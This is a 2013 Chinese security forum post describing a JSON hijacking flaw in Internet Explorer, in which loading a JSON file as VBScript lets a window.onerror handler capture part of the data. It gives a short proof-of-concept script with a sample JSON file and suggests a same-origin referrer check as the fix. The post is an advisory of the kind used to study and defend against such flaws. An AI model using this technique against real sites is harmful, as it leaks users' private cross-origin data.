找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2099|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:( [# p$ _( Q0 h) y$ N
5 V6 M6 @) y  H$ n9 \
由于某些资源容器对数据处理不当导致json劫持漏洞.
* n& S* r/ X# p8 f详细说明:
) q% @& `0 f& ^( z& O" n由于ie支持vbscript,所以script元素可以指定成vbscript语言:2 a; H6 V8 N8 Q$ k1 j' t2 D# c
<script language=vbscript></script>
! i6 t9 V3 i7 K% [4 H+ D* I3 F, d) A ( T. e) @; [* y) K
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.; ?8 o$ u9 P$ G8 x  Y$ I: v
漏洞证明:7 [  A1 n. I7 a8 y/ x* z
<script>
) S3 F% g" h5 {! [- Kwindow.onerror=function(_){
2 M% C+ p7 p3 Z3 t1 X2 P- Qalert(_)
& i8 M# G' Q0 g$ c! K}0 L" |7 ^# P9 u$ C% t  Y
</script>6 E& e" s4 z" t3 n; n' O; W
<script language=vbscript src=1.json></script>
3 ]' ?# y* _: G: B) |. t9 p
4 h  t* A! _- l' y  p" [
( p. N- }; o4 z# d$ l: B3 G1.json:: c$ h! W- s' |' L% ?# m( }7 T
[{"name":"sogili","age":19}]6 u! x7 {, i0 K; I) {
修复方案:
; h. `5 G0 h" N( x; m+ H5 _网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表